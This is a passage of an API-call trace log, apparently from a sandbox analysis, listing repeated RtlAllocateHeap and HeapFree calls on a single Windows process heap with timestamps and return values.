Size=0x13200) returned 0x2cccc30 [0083.898] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cdfe40 [0083.898] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cf3050 [0083.898] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d06260 [0083.899] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d19470 [0083.899] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d2c680 [0083.900] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d3f890 [0083.900] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d52aa0 [0083.900] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d65cb0 [0083.901] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d78ec0 [0083.901] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d8c0d0 [0083.902] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d9f2e0 [0083.902] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2db24f0 [0083.903] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dc5700 [0083.903] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dd8910 [0083.904] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e00080 [0083.905] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e13290 [0083.905] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e264a0 [0083.906] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e396b0 [0083.906] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e4c8c0 [0083.907] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e5fad0 [0083.907] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9e0) returned 0x45c5d0 [0083.907] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.907] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e72ce0 [0083.908] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e85ef0 [0083.908] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e99100 [0083.909] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2eac310 [0083.909] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ebf520 [0083.910] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ed2730 [0083.910] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ee5940 [0083.910] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ef8b50 [0083.911] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f0bd60 [0083.911] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f1ef70 [0083.912] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f32180 [0083.912] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f45390 [0084.069] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f585a0 [0084.070] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f6b7b0 [0084.070] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f7e9c0 [0084.089] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5d0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x467460 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x487260 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x49a470 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4ad680 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4c0890 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4d3aa0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4e6cb0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4f9ec0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x50d0d0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e10080 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e23290 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e364a0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e496b0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e5c8c0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e6fad0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e82ce0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e95ef0 | out: hHeap=0x430000) returned 1 [0089.208] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ea9100 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ebc310 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ecf520 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ee2730 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2000080 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2013290 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20264a0 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20396b0 | out: hHeap=0x430000) returned 1 [0089.209] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x204c8c0 | out: hHeap=0x430000) returned 1 [0089.222] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x205fad0 | out: hHeap=0x430000) returned 1 [0089.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2072ce0 | out: hHeap=0x430000) returned 1 [0089.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2085ef0 | out: hHeap=0x430000) returned 1 [0089.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2099100 | out: hHeap=0x430000) returned 1 [0089.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20ac310 | out: hHeap=0x430000) returned 1 [0089.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20bf520 | out: hHeap=0x430000) returned 1 [0089.382] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20d2730 | out: hHeap=0x430000) returned 1 [0089.382] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20e5940 | out: hHeap=0x430000) returned 1 [0089.382] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20f8b50 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x210bd60 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x211ef70 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2132180 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2145390 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21585a0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x216b7b0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x217e9c0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2191bd0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21a4de0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21b7ff0 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21cb200 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21de410 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2200080 | out: hHeap=0x430000) returned 1 [0089.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2213290 | out: hHeap=0x430000) returned 1 [0089.391] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22264a0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22396b0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x224c8c0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x225fad0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2272ce0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2285ef0 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2299100 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22ac310 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22bf520 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22d2730 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22e5940 | out: hHeap=0x430000) returned 1 [0089.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22f8b50 | out: hHeap=0x430000) returned 1 [0089.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x230bd60 | out: hHeap=0x430000) returned 1 [0089.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x231ef70 | out: hHeap=0x430000) returned 1 [0089.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2332180 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2345390 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23585a0 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x236b7b0 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x237e9c0 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2391bd0 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23a4de0 | out: hHeap=0x430000) returned 1 [0089.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23b7ff0 | out: hHeap=0x430000) returned 1 [0089.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23cb200 | out: hHeap=0x430000) returned 1 [0089.405] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23de410 | out: hHeap=0x430000) returned 1 [0089.405] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23f1620 | out: hHeap=0x430000) returned 1 [0089.405] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2404830 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2417a40 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x242ac50 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x243de60 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2451070 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2464280 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2477490 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x248a6a0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x249d8b0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24b0ac0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24c3cd0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24d6ee0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24ea0f0 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24fd300 | out: hHeap=0x430000) returned 1 [0089.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2510510 | out: hHeap=0x430000) returned 1 [0089.415] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2523720 | out: hHeap=0x430000) returned 1 [0089.415] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2536930 | out: hHeap=0x430000) returned 1 [0089.415] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2549b40 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x255cd50 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x256ff60 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2583170 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2596380 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25a9590 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25bc7a0 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25cf9b0 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25e2bc0 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2600080 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2613290 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26264a0 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26396b0 | out: hHeap=0x430000) returned 1 [0089.416] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x264c8c0 | out: hHeap=0x430000) returned 1 [0089.417] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x265fad0 | out: hHeap=0x430000) returned 1 [0089.417] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2672ce0 | out: hHeap=0x430000) returned 1 [0089.417] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2685ef0 | out: hHeap=0x430000) returned 1 [0089.417] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2699100 | out: hHeap=0x430000) returned 1 [0089.579] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26ac310 | out: hHeap=0x430000) returned 1 [0089.587] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26bf520 | out: hHeap=0x430000) returned 1 [0089.589] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26d2730 | out: hHeap=0x430000) returned 1 [0089.589] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26e5940 | out: hHeap=0x430000) returned 1 [0089.589] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26f8b50 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x270bd60 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x271ef70 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2732180 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2745390 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27585a0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x276b7b0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x277e9c0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2791bd0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27a4de0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27b7ff0 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27cb200 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27de410 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27f1620 | out: hHeap=0x430000) returned 1 [0089.593] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2804830 | out: hHeap=0x430000) returned 1 [0089.598] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2817a40 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x282ac50 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x283de60 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2851070 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2864280 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2877490 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x288a6a0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x289d8b0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28b0ac0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28c3cd0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28d6ee0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28ea0f0 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28fd300 | out: hHeap=0x430000) returned 1 [0089.599] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2910510 | out: hHeap=0x430000) returned 1 [0089.604] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2923720 | out: hHeap=0x430000) returned 1 [0089.604] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2936930 | out: hHeap=0x430000) returned 1 [0089.604] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2949b40 | out: hHeap=0x430000) returned 1 [0089.604] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x295cd50 | out: hHeap=0x430000) returned 1 [0089.605] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x296ff60 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2983170 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2996380 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29a9590 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29bc7a0 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29cf9b0 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29e2bc0 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29f5dd0 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a08fe0 | out: hHeap=0x430000) returned 1 [0089.606] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a1c1f0 | out: hHeap=0x430000) returned 1 [0089.610] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a2f400 | out: hHeap=0x430000) returned 1 [0089.610] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a42610 | out: hHeap=0x430000) returned 1 [0089.610] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a55820 | out: hHeap=0x430000) returned 1 [0089.611] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a68a30 | out: hHeap=0x430000) returned 1 [0089.611] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a7bc40 | out: hHeap=0x430000) returned 1 [0089.612] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a8ee50 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2aa2060 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ab5270 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ac8480 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2adb690 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2aee8a0 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b01ab0 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b14cc0 | out: hHeap=0x430000) returned 1 [0089.613] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b27ed0 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b3b0e0 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b4e2f0 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b61500 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b74710 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b87920 | out: hHeap=0x430000) returned 1 [0089.772] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b9ab30 | out: hHeap=0x430000) returned 1 [0089.774] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2badd40 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bc0f50 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bd4160 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2be7370 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bfa580 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c0d790 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c209a0 | out: hHeap=0x430000) returned 1 [0089.776] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c33bb0 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c46dc0 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c59fd0 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c6d1e0 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c803f0 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x430000) returned 1 [0089.780] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ca6810 | out: hHeap=0x430000) returned 1 [0089.782] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cb9a20 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cccc30 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cdfe40 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cf3050 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d06260 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d19470 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d2c680 | out: hHeap=0x430000) returned 1 [0089.783] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d3f890 | out: hHeap=0x430000) returned 1 [0089.788] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d52aa0 | out: 